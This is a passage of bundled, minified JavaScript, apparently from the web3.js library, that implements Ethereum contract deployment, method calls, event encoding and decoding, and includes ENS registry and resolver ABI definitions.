            2795: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ALL_EVENTS_ABI = t.ALL_EVENTS = void 0, t.ALL_EVENTS = "ALLEVENTS", t.ALL_EVENTS_ABI = {
                    name: t.ALL_EVENTS,
                    signature: "",
                    type: "event",
                    inputs: []
                };
            },
            6658: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Contract = void 0;
                const i = r(6527), o = r(5071), s = r(6637), a = r(8381), u = r(9970), c = r(9634), l = r(7345), d = r(2795), h = r(5537), f = r(7388), p = r(3948), m = {
                    logs: f.LogsSubscription,
                    newHeads: s.NewHeadsSubscription,
                    newBlockHeaders: s.NewHeadsSubscription
                };
                class g extends i.Web3Context {
                    constructor(e, t, r, n, s){
                        var a, d, h;
                        const f = (0, p.isContractInitOptions)(t) ? t : (0, p.isContractInitOptions)(r) ? r : void 0;
                        if (!(0, l.isNullish)(f) && !(0, l.isNullish)(f.data) && !(0, l.isNullish)(f.input)) throw new o.ContractTransactionDataAndInputError({
                            data: f.data,
                            input: f.input
                        });
                        let y, v;
                        y = (0, p.isWeb3ContractContext)(t) ? t : (0, p.isWeb3ContractContext)(r) ? r : n, v = "object" == typeof t && "provider" in t ? t.provider : "object" == typeof r && "provider" in r ? r.provider : "object" == typeof n && "provider" in n ? n.provider : g.givenProvider, super(Object.assign(Object.assign({}, y), {
                            provider: v,
                            registeredSubscriptions: m
                        })), this.syncWithContext = !1, this._functions = {}, this._overloadedMethodAbis = new Map;
                        const b = (0, c.isDataFormat)(n) ? n : (0, c.isDataFormat)(r) ? r : null != s ? s : u.DEFAULT_RETURN_FORMAT, E = "string" == typeof t ? t : void 0;
                        this._parseAndSetJsonInterface(e, b), (0, l.isNullish)(E) || this._parseAndSetAddress(E, b), this.options = {
                            address: E,
                            jsonInterface: this._jsonInterface,
                            gas: null !== (a = null == f ? void 0 : f.gas) && void 0 !== a ? a : null == f ? void 0 : f.gasLimit,
                            gasPrice: null == f ? void 0 : f.gasPrice,
                            from: null == f ? void 0 : f.from,
                            input: null !== (d = null == f ? void 0 : f.input) && void 0 !== d ? d : null == f ? void 0 : f.data
                        }, this.syncWithContext = null !== (h = null == f ? void 0 : f.syncWithContext) && void 0 !== h && h, y instanceof i.Web3Context && this.subscribeToContextEvents(y), Object.defineProperty(this.options, "address", {
                            set: (e)=>this._parseAndSetAddress(e, b),
                            get: ()=>this._address
                        }), Object.defineProperty(this.options, "jsonInterface", {
                            set: (e)=>this._parseAndSetJsonInterface(e, b),
                            get: ()=>this._jsonInterface
                        });
                    }
                    get events() {
                        return this._events;
                    }
                    get methods() {
                        return this._methods;
                    }
                    clone() {
                        let e;
                        return e = this.options.address ? new g([
                            ...this._jsonInterface,
                            ...this._errorsInterface
                        ], this.options.address, {
                            gas: this.options.gas,
                            gasPrice: this.options.gasPrice,
                            from: this.options.from,
                            input: this.options.input,
                            provider: this.currentProvider,
                            syncWithContext: this.syncWithContext
                        }, this.getContextObject()) : new g([
                            ...this._jsonInterface,
                            ...this._errorsInterface
                        ], {
                            gas: this.options.gas,
                            gasPrice: this.options.gasPrice,
                            from: this.options.from,
                            input: this.options.input,
                            provider: this.currentProvider,
                            syncWithContext: this.syncWithContext
                        }, this.getContextObject()), this.context && e.subscribeToContextEvents(this.context), e;
                    }
                    deploy(e) {
                        var t, r, i;
                        let s = this._jsonInterface.find((e)=>"constructor" === e.type);
                        s || (s = {
                            type: "constructor",
                            inputs: [],
                            stateMutability: ""
                        });
                        const a = (0, c.format)({
                            format: "bytes"
                        }, null !== (r = null !== (t = null == e ? void 0 : e.input) && void 0 !== t ? t : null == e ? void 0 : e.data) && void 0 !== r ? r : this.options.input, u.DEFAULT_RETURN_FORMAT);
                        if (!a || "0x" === a.trim()) throw new o.Web3ContractError("contract creation without any data provided.");
                        const l = null !== (i = null == e ? void 0 : e.arguments) && void 0 !== i ? i : [], d = Object.assign(Object.assign({}, this.options), {
                            input: a
                        });
                        return {
                            arguments: l,
                            send: (e)=>{
                                const t = Object.assign({}, e);
                                return this._contractMethodDeploySend(s, l, t, d);
                            },
                            estimateGas: (e, t = u.DEFAULT_RETURN_FORMAT)=>n(this, void 0, void 0, function*() {
                                    const r = Object.assign({}, e);
                                    return this._contractMethodEstimateGas({
                                        abi: s,
                                        params: l,
                                        returnFormat: t,
                                        options: r,
                                        contractOptions: d
                                    });
                                }),
                            encodeABI: ()=>(0, h.encodeMethodABI)(s, l, (0, c.format)({
                                    format: "bytes"
                                }, a, u.DEFAULT_RETURN_FORMAT))
                        };
                    }
                    getPastEvents(e, t, r) {
                        var i;
                        return n(this, void 0, void 0, function*() {
                            const n = "string" == typeof e ? e : "allEvents", a = "string" == typeof e || (0, c.isDataFormat)(e) ? (0, c.isDataFormat)(t) ? {} : t : e, l = (0, c.isDataFormat)(e) ? e : (0, c.isDataFormat)(t) ? t : null != r ? r : u.DEFAULT_RETURN_FORMAT, f = "allEvents" === n ? d.ALL_EVENTS_ABI : this._jsonInterface.find((e)=>"name" in e && e.name === n);
                            if (!f) throw new o.Web3ContractError(`Event ${n} not found.`);
                            const { fromBlock: p, toBlock: m, topics: g, address: y } = (0, h.encodeEventABI)(this.options, f, null != a ? a : {}), v = (yield (0, s.getLogs)(this, {
                                fromBlock: p,
                                toBlock: m,
                                topics: g,
                                address: y
                            }, l)).map((e)=>"string" == typeof e ? e : (0, h.decodeEventABI)(f, e, this._jsonInterface, l)), b = null !== (i = null == a ? void 0 : a.filter) && void 0 !== i ? i : {}, E = Object.keys(b);
                            return E.length > 0 ? v.filter((e)=>"string" == typeof e || E.every((t)=>{
                                    var r;
                                    if (Array.isArray(b[t])) return b[t].some((r)=>String(e.returnValues[t]).toUpperCase() === String(r).toUpperCase());
                                    const n = null === (r = f.inputs) || void 0 === r ? void 0 : r.filter((e)=>e.name === t)[0];
                                    return !(!(null == n ? void 0 : n.indexed) || "string" !== n.type || (0, c.keccak256)(b[t]) !== String(e.returnValues[t])) || String(e.returnValues[t]).toUpperCase() === String(b[t]).toUpperCase();
                                })) : v;
                        });
                    }
                    _parseAndSetAddress(e, t = u.DEFAULT_RETURN_FORMAT) {
                        this._address = e ? (0, c.toChecksumAddress)((0, c.format)({
                            format: "address"
                        }, e, t)) : e;
                    }
                    _parseAndSetJsonInterface(e, t = u.DEFAULT_RETURN_FORMAT) {
                        var r, n, i, o, s;
                        this._functions = {}, this._methods = {}, this._events = {};
                        let c = [];
                        const l = e.filter((e)=>"error" !== e.type), h = e.filter((e)=>(0, a.isAbiErrorFragment)(e));
                        for (const e of l){
                            const u = Object.assign(Object.assign({}, e), {
                                signature: ""
                            });
                            if ((0, a.isAbiFunctionFragment)(u)) {
                                const e = (0, a.jsonInterfaceMethodToString)(u), t = (0, a.encodeFunctionSignature)(e);
                                u.signature = t, u.constant = null !== (n = (r = "view" === u.stateMutability, void 0 !== r) ? r : "pure" === u.stateMutability) && void 0 !== n ? n : u.constant, u.payable = (i = "payable" === u.stateMutability, void 0 !== i) ? i : u.payable, this._overloadedMethodAbis.set(u.name, [
                                    ...null !== (o = this._overloadedMethodAbis.get(u.name)) && void 0 !== o ? o : [],
                                    u
                                ]);
                                const c = null !== (s = this._overloadedMethodAbis.get(u.name)) && void 0 !== s ? s : [], l = this._createContractMethod(c, h);
                                this._functions[e] = {
                                    signature: t,
                                    method: l
                                }, this._methods[u.name] = this._functions[e].method, this._methods[e] = this._functions[e].method, this._methods[t] = this._functions[e].method;
                            } else if ((0, a.isAbiEventFragment)(u)) {
                                const e = (0, a.jsonInterfaceMethodToString)(u), r = (0, a.encodeEventSignature)(e), n = this._createContractEvent(u, t);
                                u.signature = r, e in this._events && "bound" !== u.name || (this._events[e] = n), this._events[u.name] = n, this._events[r] = n;
                            }
                            this._events.allEvents = this._createContractEvent(d.ALL_EVENTS_ABI, t), c = [
                                ...c,
                                u
                            ];
                        }
                        this._jsonInterface = [
                            ...c
                        ], this._errorsInterface = h;
                    }
                    _getAbiParams(e, t) {
                        var r;
                        try {
                            return l.utils.transformJsonDataToAbiFormat(null !== (r = e.inputs) && void 0 !== r ? r : [], t);
                        } catch (t) {
                            throw new o.Web3ContractError(`Invalid parameters for method ${e.name}: ${t.message}`);
                        }
                    }
                    _createContractMethod(e, t) {
                        const r = e[e.length - 1];
                        return (...e)=>{
                            var i, o;
                            let s;
                            const a = null !== (i = this._overloadedMethodAbis.get(r.name)) && void 0 !== i ? i : [];
                            let c = a[0];
                            const d = t, f = a.filter((t)=>{
                                var r;
                                return (null !== (r = t.inputs) && void 0 !== r ? r : []).length === e.length;
                            });
                            if (1 === a.length || 0 === f.length) s = this._getAbiParams(c, e), l.validator.validate(null !== (o = r.inputs) && void 0 !== o ? o : [], s);
                            else {
                                const t = [];
                                for (const r of f)try {
                                    s = this._getAbiParams(r, e), l.validator.validate(r.inputs, s), c = r;
                                    break;
                                } catch (e) {
                                    t.push(e);
                                }
                                if (t.length === f.length) throw new l.Web3ValidatorError(t);
                            }
                            const p = {
                                arguments: s,
                                call: (e, t)=>n(this, void 0, void 0, function*() {
                                        return this._contractMethodCall(c, s, d, e, t);
                                    }),
                                send: (e)=>this._contractMethodSend(c, s, d, e),
                                estimateGas: (e, t = u.DEFAULT_RETURN_FORMAT)=>n(this, void 0, void 0, function*() {
                                        return this._contractMethodEstimateGas({
                                            abi: c,
                                            params: s,
                                            returnFormat: t,
                                            options: e
                                        });
                                    }),
                                encodeABI: ()=>(0, h.encodeMethodABI)(c, s),
                                createAccessList: (e, t)=>n(this, void 0, void 0, function*() {
                                        return this._contractMethodCreateAccessList(c, s, d, e, t);
                                    })
                            };
                            return c.stateMutability, p;
                        };
                    }
                    _contractMethodCall(e, t, r, i, c) {
                        var l;
                        return n(this, void 0, void 0, function*() {
                            const n = (0, p.getEthTxCallParams)({
                                abi: e,
                                params: t,
                                options: i,
                                contractOptions: Object.assign(Object.assign({}, this.options), {
                                    from: null !== (l = this.options.from) && void 0 !== l ? l : this.config.defaultAccount
                                })
                            });
                            try {
                                const t = yield (0, s.call)(this, n, c, u.DEFAULT_RETURN_FORMAT);
                                return (0, h.decodeMethodReturn)(e, t);
                            } catch (e) {
                                throw e instanceof o.ContractExecutionError && (0, a.decodeContractErrorData)(r, e.innerError), e;
                            }
                        });
                    }
                    _contractMethodCreateAccessList(e, t, r, i, c) {
                        var l;
                        return n(this, void 0, void 0, function*() {
                            const n = (0, p.getCreateAccessListParams)({
                                abi: e,
                                params: t,
                                options: i,
                                contractOptions: Object.assign(Object.assign({}, this.options), {
                                    from: null !== (l = this.options.from) && void 0 !== l ? l : this.config.defaultAccount
                                })
                            });
                            try {
                                return (0, s.createAccessList)(this, n, c, u.DEFAULT_RETURN_FORMAT);
                            } catch (e) {
                                throw e instanceof o.ContractExecutionError && (0, a.decodeContractErrorData)(r, e.innerError), e;
                            }
                        });
                    }
                    _contractMethodSend(e, t, r, n, i) {
                        var c, l;
                        let d = null != i ? i : this.options;
                        d = Object.assign(Object.assign({}, d), {
                            input: void 0,
                            from: null !== (l = null !== (c = d.from) && void 0 !== c ? c : this.defaultAccount) && void 0 !== l ? l : void 0
                        });
                        const h = (0, p.getSendTxParams)({
                            abi: e,
                            params: t,
                            options: n,
                            contractOptions: d
                        }), f = (0, s.sendTransaction)(this, h, u.DEFAULT_RETURN_FORMAT, {
                            checkRevertBeforeSending: !1
                        });
                        return f.on("error", (e)=>{
                            e instanceof o.ContractExecutionError && (0, a.decodeContractErrorData)(r, e.innerError);
                        }), f;
                    }
                    _contractMethodDeploySend(e, t, r, n) {
                        var i, a;
                        let c = null != n ? n : this.options;
                        c = Object.assign(Object.assign({}, c), {
                            from: null !== (a = null !== (i = c.from) && void 0 !== i ? i : this.defaultAccount) && void 0 !== a ? a : void 0
                        });
                        const l = (0, p.getSendTxParams)({
                            abi: e,
                            params: t,
                            options: r,
                            contractOptions: c
                        });
                        return (0, s.sendTransaction)(this, l, u.DEFAULT_RETURN_FORMAT, {
                            transactionResolver: (e)=>{
                                if (e.status === BigInt(0)) throw new o.Web3ContractError("code couldn't be stored", e);
                                const t = this.clone();
                                return t.options.address = e.contractAddress, t;
                            },
                            checkRevertBeforeSending: !1
                        });
                    }
                    _contractMethodEstimateGas({ abi: e, params: t, returnFormat: r, options: i, contractOptions: o }) {
                        return n(this, void 0, void 0, function*() {
                            const n = (0, p.getEstimateGasParams)({
                                abi: e,
                                params: t,
                                options: i,
                                contractOptions: null != o ? o : this.options
                            });
                            return (0, s.estimateGas)(this, n, u.BlockTags.LATEST, r);
                        });
                    }
                    _createContractEvent(e, t = u.DEFAULT_RETURN_FORMAT) {
                        return (...r)=>{
                            var n;
                            const { topics: i, fromBlock: s } = (0, h.encodeEventABI)(this.options, e, r[0]), a = new f.LogsSubscription({
                                address: this.options.address,
                                topics: i,
                                abi: e,
                                jsonInterface: this._jsonInterface
                            }, {
                                subscriptionManager: this.subscriptionManager,
                                returnFormat: t
                            });
                            return (0, l.isNullish)(s) || this.getPastEvents(e.name, {
                                fromBlock: s,
                                topics: i
                            }, t).then((e)=>{
                                e.forEach((e)=>a.emit("data", e));
                            }).catch(()=>{
                                a.emit("error", new o.SubscriptionError("Failed to get past events."));
                            }), null === (n = this.subscriptionManager) || void 0 === n || n.addSubscription(a).catch(()=>{
                                a.emit("error", new o.SubscriptionError("Failed to subscribe."));
                            }), a;
                        };
                    }
                    subscribeToContextEvents(e) {
                        const t = this;
                        this.context = e, t.syncWithContext && e.on(i.Web3ConfigEvent.CONFIG_CHANGE, (e)=>{
                            t.setConfig({
                                [e.name]: e.newValue
                            });
                        });
                    }
                }
                t.Contract = g;
            },
            5537: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.decodeMethodReturn = t.encodeMethodABI = t.decodeEventABI = t.encodeEventABI = void 0;
                const n = r(9634), i = r(9970), o = r(8381), s = r(6637), a = r(5071);
                t.encodeEventABI = ({ address: e }, t, r)=>{
                    var a, u;
                    const c = null == r ? void 0 : r.topics, l = null !== (a = null == r ? void 0 : r.filter) && void 0 !== a ? a : {}, d = {};
                    if ((0, n.isNullish)(null == r ? void 0 : r.fromBlock) || (d.fromBlock = (0, n.format)(s.blockSchema.properties.number, null == r ? void 0 : r.fromBlock, {
                        number: i.FMT_NUMBER.HEX,
                        bytes: i.FMT_BYTES.HEX
                    })), (0, n.isNullish)(null == r ? void 0 : r.toBlock) || (d.toBlock = (0, n.format)(s.blockSchema.properties.number, null == r ? void 0 : r.toBlock, {
                        number: i.FMT_NUMBER.HEX,
                        bytes: i.FMT_BYTES.HEX
                    })), c && Array.isArray(c)) d.topics = [
                        ...c
                    ];
                    else if (d.topics = [], t && !t.anonymous && "ALLEVENTS" !== t.name && d.topics.push(null !== (u = t.signature) && void 0 !== u ? u : (0, o.encodeEventSignature)((0, o.jsonInterfaceMethodToString)(t))), "ALLEVENTS" !== t.name && t.inputs) for (const e of t.inputs){
                        if (!e.indexed) continue;
                        const t = l[e.name];
                        t ? Array.isArray(t) ? d.topics.push(t.map((t)=>(0, o.encodeParameter)(e.type, t))) : "string" === e.type ? d.topics.push((0, n.keccak256)(t)) : d.topics.push((0, o.encodeParameter)(e.type, t)) : d.topics.push(null);
                    }
                    return d.topics.length || delete d.topics, e && (d.address = e.toLowerCase()), d;
                }, t.decodeEventABI = (e, t, r, a = i.DEFAULT_RETURN_FORMAT)=>{
                    var u, c, l, d, h;
                    let f = Object.assign({}, e);
                    const p = (0, n.format)(s.logSchema, t, a);
                    if ("ALLEVENTS" === f.name) f = r.find((e)=>e.signature === t.topics[0]) || {
                        anonymous: !0
                    };
                    if (f.inputs = null !== (c = null !== (u = f.inputs) && void 0 !== u ? u : e.inputs) && void 0 !== c ? c : [], !f.anonymous) {
                        let e = 0;
                        (null !== (l = f.inputs) && void 0 !== l ? l : []).forEach((t)=>{
                            t.indexed && (e += 1);
                        }), e > 0 && (null == t ? void 0 : t.topics) && (null == t ? void 0 : t.topics.length) !== e + 1 && (f = Object.assign(Object.assign({}, f), {
                            anonymous: !0,
                            inputs: []
                        }));
                    }
                    const m = f.anonymous ? t.topics : (null !== (d = t.topics) && void 0 !== d ? d : []).slice(1);
                    return Object.assign(Object.assign({}, p), {
                        returnValues: (0, o.decodeLog)([
                            ...null !== (h = f.inputs) && void 0 !== h ? h : []
                        ], t.data, m),
                        event: f.name,
                        signature: !f.anonymous && t.topics && 0 !== t.topics.length && t.topics[0] ? t.topics[0] : void 0,
                        raw: {
                            data: t.data,
                            topics: t.topics
                        }
                    });
                }, t.encodeMethodABI = (e, t, r)=>{
                    const n = Array.isArray(e.inputs) ? e.inputs.length : 0;
                    if (n !== t.length) throw new a.Web3ContractError(`The number of arguments is not matching the methods required number. You need to pass ${n} arguments.`);
                    const i = (0, o.encodeParameters)(Array.isArray(e.inputs) ? e.inputs : [], t).replace("0x", "");
                    if ((0, o.isAbiConstructorFragment)(e)) {
                        if (!r) throw new a.Web3ContractError("The contract has no contract data option set. This is necessary to append the constructor parameters.");
                        return r.startsWith("0x") ? `${r}${i}` : `0x${r}${i}`;
                    }
                    return `${(0, o.encodeFunctionSignature)(e)}${i}`;
                }, t.decodeMethodReturn = (e, t)=>{
                    if ("constructor" === e.type) return t;
                    if (!t) return null;
                    const r = t.length >= 2 ? t.slice(2) : t;
                    if (!e.outputs) return null;
                    const n = (0, o.decodeParameters)([
                        ...e.outputs
                    ], r);
                    return 1 === n.__length__ ? n[0] : n;
                };
            },
            3211: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
                const o = r(6658);
                i(r(5537), t), i(r(6658), t), i(r(7388), t), i(r(3951), t), t.default = o.Contract;
            },
            7388: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.LogsSubscription = void 0;
                const n = r(6527), i = r(5537);
                class o extends n.Web3Subscription {
                    constructor(e, t){
                        super(e, t), this.address = e.address, this.topics = e.topics, this.abi = e.abi, this.jsonInterface = e.jsonInterface;
                    }
                    _buildSubscriptionParams() {
                        return [
                            "logs",
                            {
                                address: this.address,
                                topics: this.topics
                            }
                        ];
                    }
                    _processSubscriptionResult(e) {
                        const t = (0, i.decodeEventABI)(this.abi, e, this.jsonInterface, super.returnFormat);
                        this.emit("data", t);
                    }
                }
                t.LogsSubscription = o;
            },
            3951: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            3948: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.getCreateAccessListParams = t.isWeb3ContractContext = t.isContractInitOptions = t.getEstimateGasParams = t.getEthTxCallParams = t.getSendTxParams = void 0;
                const n = r(5071), i = r(9634), o = r(5537);
                t.getSendTxParams = ({ abi: e, params: t, options: r, contractOptions: s })=>{
                    var a, u;
                    if (!(null !== (u = null !== (a = null == r ? void 0 : r.input) && void 0 !== a ? a : null == r ? void 0 : r.data) && void 0 !== u ? u : s.input) && !(null == r ? void 0 : r.to) && !s.address) throw new n.Web3ContractError("Contract address not specified");
                    if (!(null == r ? void 0 : r.from) && !s.from) throw new n.Web3ContractError('Contract "from" address not specified');
                    let c = (0, i.mergeDeep)({
                        to: s.address,
                        gas: s.gas,
                        gasPrice: s.gasPrice,
                        from: s.from,
                        input: s.input,
                        maxPriorityFeePerGas: s.maxPriorityFeePerGas,
                        maxFeePerGas: s.maxFeePerGas
                    }, r);
                    return c.input && "constructor" !== e.type || (c = Object.assign(Object.assign({}, c), {
                        input: (0, o.encodeMethodABI)(e, t, c.input)
                    })), c;
                }, t.getEthTxCallParams = ({ abi: e, params: t, options: r, contractOptions: s })=>{
                    if (!(null == r ? void 0 : r.to) && !s.address) throw new n.Web3ContractError("Contract address not specified");
                    let a = (0, i.mergeDeep)({
                        to: s.address,
                        gas: s.gas,
                        gasPrice: s.gasPrice,
                        from: s.from,
                        input: s.input,
                        maxPriorityFeePerGas: s.maxPriorityFeePerGas,
                        maxFeePerGas: s.maxFeePerGas
                    }, r);
                    return a = Object.assign(Object.assign({}, a), {
                        input: (0, o.encodeMethodABI)(e, t, a.input ? (0, i.toHex)(a.input) : void 0)
                    }), a;
                }, t.getEstimateGasParams = ({ abi: e, params: t, options: r, contractOptions: n })=>{
                    let s = (0, i.mergeDeep)({
                        to: n.address,
                        gas: n.gas,
                        gasPrice: n.gasPrice,
                        from: n.from,
                        input: n.input
                    }, r);
                    return s = Object.assign(Object.assign({}, s), {
                        input: (0, o.encodeMethodABI)(e, t, s.input ? (0, i.toHex)(s.input) : void 0)
                    }), s;
                }, t.isContractInitOptions = (e)=>"object" == typeof e && !(0, i.isNullish)(e) && [
                        "input",
                        "data",
                        "from",
                        "gas",
                        "gasPrice",
                        "gasLimit",
                        "address",
                        "jsonInterface",
                        "syncWithContext"
                    ].some((t)=>t in e), t.isWeb3ContractContext = (e)=>"object" == typeof e && !(0, i.isNullish)(e) && !(0, t.isContractInitOptions)(e), t.getCreateAccessListParams = ({ abi: e, params: t, options: r, contractOptions: s })=>{
                    if (!(null == r ? void 0 : r.to) && !s.address) throw new n.Web3ContractError("Contract address not specified");
                    if (!(null == r ? void 0 : r.from) && !s.from) throw new n.Web3ContractError('Contract "from" address not specified');
                    let a = (0, i.mergeDeep)({
                        to: s.address,
                        gas: s.gas,
                        gasPrice: s.gasPrice,
                        from: s.from,
                        input: s.input,
                        maxPriorityFeePerGas: s.maxPriorityFeePerGas,
                        maxFeePerGas: s.maxFeePerGas
                    }, r);
                    return a.input && "constructor" !== e.type || (a = Object.assign(Object.assign({}, a), {
                        input: (0, o.encodeMethodABI)(e, t, a.input)
                    })), a;
                };
            },
            6919: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ENSRegistryAbi = void 0, t.ENSRegistryAbi = [
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "label",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "address",
                                name: "owner",
                                type: "address"
                            }
                        ],
                        name: "NewOwner",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "address",
                                name: "resolver",
                                type: "address"
                            }
                        ],
                        name: "NewResolver",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "address",
                                name: "owner",
                                type: "address"
                            }
                        ],
                        name: "Transfer",
                        type: "event"
                    },
                    {
                        inputs: [
                            {
                                internalType: "address",
                                name: "owner",
                                type: "address"
                            },
                            {
                                internalType: "address",
                                name: "operator",
                                type: "address"
                            }
                        ],
                        name: "isApprovedForAll",
                        outputs: [
                            {
                                internalType: "bool",
                                name: "",
                                type: "bool"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            }
                        ],
                        name: "owner",
                        outputs: [
                            {
                                internalType: "address",
                                name: "",
                                type: "address"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            }
                        ],
                        name: "recordExists",
                        outputs: [
                            {
                                internalType: "bool",
                                name: "",
                                type: "bool"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            }
                        ],
                        name: "resolver",
                        outputs: [
                            {
                                internalType: "address",
                                name: "",
                                type: "address"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            }
                        ],
                        name: "ttl",
                        outputs: [
                            {
                                internalType: "uint64",
                                name: "",
                                type: "uint64"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    }
                ];
            },
            172: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.PublicResolverAbi = void 0, t.PublicResolverAbi = [
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "address",
                                name: "a",
                                type: "address"
                            }
                        ],
                        name: "AddrChanged",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "uint256",
                                name: "coinType",
                                type: "uint256"
                            },
                            {
                                indexed: !1,
                                internalType: "bytes",
                                name: "newAddress",
                                type: "bytes"
                            }
                        ],
                        name: "AddressChanged",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "address",
                                name: "owner",
                                type: "address"
                            },
                            {
                                indexed: !0,
                                internalType: "address",
                                name: "operator",
                                type: "address"
                            },
                            {
                                indexed: !1,
                                internalType: "bool",
                                name: "approved",
                                type: "bool"
                            }
                        ],
                        name: "ApprovalForAll",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "bytes",
                                name: "hash",
                                type: "bytes"
                            }
                        ],
                        name: "ContenthashChanged",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "bytes",
                                name: "name",
                                type: "bytes"
                            },
                            {
                                indexed: !1,
                                internalType: "uint16",
                                name: "resource",
                                type: "uint16"
                            },
                            {
                                indexed: !1,
                                internalType: "bytes",
                                name: "record",
                                type: "bytes"
                            }
                        ],
                        name: "DNSRecordChanged",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "bytes",
                                name: "name",
                                type: "bytes"
                            },
                            {
                                indexed: !1,
                                internalType: "uint16",
                                name: "resource",
                                type: "uint16"
                            }
                        ],
                        name: "DNSRecordDeleted",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            }
                        ],
                        name: "DNSZoneCleared",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "bytes",
                                name: "lastzonehash",
                                type: "bytes"
                            },
                            {
                                indexed: !1,
                                internalType: "bytes",
                                name: "zonehash",
                                type: "bytes"
                            }
                        ],
                        name: "DNSZonehashChanged",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !0,
                                internalType: "bytes4",
                                name: "interfaceID",
                                type: "bytes4"
                            },
                            {
                                indexed: !1,
                                internalType: "address",
                                name: "implementer",
                                type: "address"
                            }
                        ],
                        name: "InterfaceChanged",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "string",
                                name: "name",
                                type: "string"
                            }
                        ],
                        name: "NameChanged",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "bytes32",
                                name: "x",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "bytes32",
                                name: "y",
                                type: "bytes32"
                            }
                        ],
                        name: "PubkeyChanged",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !0,
